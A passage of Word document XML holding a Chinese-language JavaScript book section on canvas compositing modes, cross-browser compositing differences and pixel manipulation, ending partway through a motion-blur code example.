        <w:t>种合成方式各自的效果，演示完全使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>硬</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>透明度：所有这些绘制的像素要么是完全透明要么是完全不透明。在这</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>个方框中，都是先绘制正方形，将其作为目标。然后再设置</w:t>
      </w:r>
      <w:r>
        <w:t>globalCompositeOperation</w:t>
      </w:r>
      <w:r>
        <w:t>属性，最后绘制圆形，将其作为源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4041475" cy="3019245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="78" name="00078.jpeg" descr="000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8.jpeg" descr="00078.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4041475" cy="3019245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>硬</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>透明度实现合成操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>21-17</w:t>
      </w:r>
      <w:r>
        <w:t>是一个相似的例子，不同的是使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>软</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>透明度。在该例中，作为原始图形的圆形和作为目的图形的正方形都是采用渐变色来绘制的，以便每个像素的透明度都会不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-17</w:t>
      </w:r>
      <w:r>
        <w:t>所示，使用半透明像素绘制时，可能就会发现要搞明白合成操作不是那么容易的。如果想要更深入地了解合成操作，在第四部分有专门对</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的合成操作做详细讲解的，它解释了</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>种合成方式中每个单独的像素值是如何从源像素和目的像素计算的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4011283" cy="3036498"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="79" name="00079.jpeg" descr="000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79.jpeg" descr="00079.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4011283" cy="3036498"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>软透明度</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>进行合成操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>截至撰写本书时，浏览器提供商在实现</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>种合成方式中的</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>种上意见不统一：</w:t>
      </w:r>
      <w:r>
        <w:t>"copy"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"source-in"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"source-out"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"destination-atop"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"destination-in"</w:t>
      </w:r>
      <w:r>
        <w:t>在不同的浏览器上表现不同，无法做到兼容。下面会具体讲解表现如何不同，但是，如果你不打算使用这些合成操作的话，完全可以跳过下一节的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上述这</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>种合成模式在计算合成结果的时候，要么是在计算结果像素值的时候直接忽略目标像素值，要么是将任何源像素中透明</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的地方全部变透明。两者在实现上的区别就在于源像素的定义上。</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>afari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>进行合成的时候，是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>局部</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>操作的：只有真正通过</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法、</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或者其他绘制操作绘制出来的像素才能算是源像素。</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>的实现方式似乎也是类似的。而</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>是进行</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>全局</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>合并的：对于每次绘制操作，在当前裁剪区域中的所有像素都会进行合成。如果源像素没有设置该像素，默认会按透明黑色处理。在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>中，这就意味着，上述</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>种合成模式实际上都会将在源像素外又在裁剪区中的像素都抹除。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-16</w:t>
      </w:r>
      <w:r>
        <w:t>和图</w:t>
      </w:r>
      <w:r>
        <w:t>21-17</w:t>
      </w:r>
      <w:r>
        <w:t>就是在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>显示的效果。这也</w:t>
      </w:r>
      <w:r>
        <w:t>就是为什么采用</w:t>
      </w:r>
      <w:r>
        <w:t>"copy"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"source-in"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"source-out"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"destination-atop"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"destination-in"</w:t>
      </w:r>
      <w:r>
        <w:t>方式合成的方框周围都要比其他的方框要细：每个例子周围的矩形指的是裁剪区域，而这</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>种合并操作将落在裁剪区域内的线段（</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>宽度的一半）给抹除了。为了作比较，图</w:t>
      </w:r>
      <w:r>
        <w:t>21-18</w:t>
      </w:r>
      <w:r>
        <w:t>显示了和图</w:t>
      </w:r>
      <w:r>
        <w:t>21-17</w:t>
      </w:r>
      <w:r>
        <w:t>同样的图形，不同的是它是显示在</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>中的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4050101" cy="3036498"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="80" name="00080.jpeg" descr="000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0.jpeg" descr="00080.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4050101" cy="3036498"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　采用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>局部</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>合成的方式而不是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>全局</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>合成的方式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>截至撰写本书时，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准的草案中定义</w:t>
      </w:r>
      <w:r>
        <w:t>的是由</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>实现的全局合成。浏览器提供厂商也意识到了不兼容性，同时对当前的标准也表示不满。而之后标准很有可能采纳局部合成的方式，而不是全局合成的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，要注意的是，在像</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>这样实现本地合成方式的浏览器中也可以使用全局合成方式。首先，创建一个和屏幕显示的画布同样尺寸的屏幕外画布。然后在该屏幕外画布中绘制一些源像素，并使用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将这些屏幕外像素复制到屏幕显示的画布中，这样就能在裁剪区域中实现全局合成了。但是没有一个通用的方法在像</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:t>样实现全局合成的浏览器中执行本地合成模式，但是通常也能够通过在要进行的本地合成方式的绘制操作之前先定义一个适当的裁剪区域来近似的模拟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="544" w:name="21_4_14_Xiang_Su_Cao_Zuo_"/>
      <w:r>
        <w:t>21.4.14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　像素操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="544"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象表示画布矩形区域中的原始（没有预先进行像素增加处理的）像素信息（由</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>分量组成）。使用</w:t>
      </w:r>
      <w:r>
        <w:t>createImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以创建一个空的</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的像素是可写的，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>因此可以对它们进行随心所欲的设置，然后再通过</w:t>
      </w:r>
      <w:r>
        <w:t>putImage</w:t>
      </w:r>
      <w:r>
        <w:t>Data()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将这些像素复制回画布中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些像素操作方法提供了对画布的底层访问。传递给</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的矩形是在默认的坐标系中的：它的尺寸以</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素为单位来度量并且不受当前坐标系变换的影响。当调用</w:t>
      </w:r>
      <w:r>
        <w:t>putImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，指定的位置也是按照默认的坐标系来处理的。而且，</w:t>
      </w:r>
      <w:r>
        <w:t>putImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会忽略所有的图形属性。它不会进行任何合成操作，也不会用</w:t>
      </w:r>
      <w:r>
        <w:t>globalAlpha</w:t>
      </w:r>
      <w:r>
        <w:t>乘以像素来显示，更不会绘制阴影。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>像素操作方法对于实现图片处理来说是很有用的。例</w:t>
      </w:r>
      <w:r>
        <w:t>21-10</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何在一张</w:t>
      </w:r>
      <w:r>
        <w:t>画布中的图形上创建一种简单的动态模糊或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>涂抹</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>效果。该例展示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>putImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以及如何在一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象中迭代和修改像素色值，但是它没有对这些进行详细的解释。想要了解</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>putImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的全部细节可以参考第四部分中对</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象解释的内容，也可以参考其中对</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象的详细解释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-10</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>实现动态模糊</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将矩形区</w:t>
      </w:r>
      <w:r>
        <w:t>域的像素向右进行涂抹，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>来产生动态模糊效果，就好像物体正在从右到左移动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//n</w:t>
      </w:r>
      <w:r>
        <w:t>必须要大于或等于</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，该值越大，涂抹区域就越大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>矩形是在默认坐标系中指定的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function smear(c,n,x,y,w,h){//</w:t>
      </w:r>
      <w:r>
        <w:t>获取表示矩形区域内像素的</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象来实现涂抹效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pixels=c.getImageData(x,y,w,h);//</w:t>
      </w:r>
      <w:r>
        <w:t>就地实现涂抹效果并且只需要</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一些图片处理算法要求额外的</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象来存储变换后的像素值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果需要输出缓冲区，可以</w:t>
      </w:r>
      <w:r>
        <w:t>以如下方式创建一个新的同样尺寸的</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//var output_pixels=c.createImageData(pixels);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这些尺寸可能和</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>之类的参数不同：有可能是每个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素要表示多个设备像素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var width=pixels.width,height=pixels.height;//data</w:t>
      </w:r>
      <w:r>
        <w:t>变量包含所有原始的像素信息：从左到右，从上到下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每个像素按照</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的顺序共占据</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>data=pixels.data;//</w:t>
      </w:r>
      <w:r>
        <w:t>每一行第一个像素之后的像素都通过将其色值替换成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>其色素值的</w:t>
      </w:r>
      <w:r>
        <w:t>1/n+</w:t>
      </w:r>
      <w:r>
        <w:t>原色素值的</w:t>
      </w:r>
      <w:r>
        <w:t>m/n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var m=n-1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var row=0;row</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>height;row++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环每一行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=row*width*4+4;//</w:t>
      </w:r>
      <w:r>
        <w:t>每行第二个元素的偏移量</w:t>
      </w:r>
    </w:p>
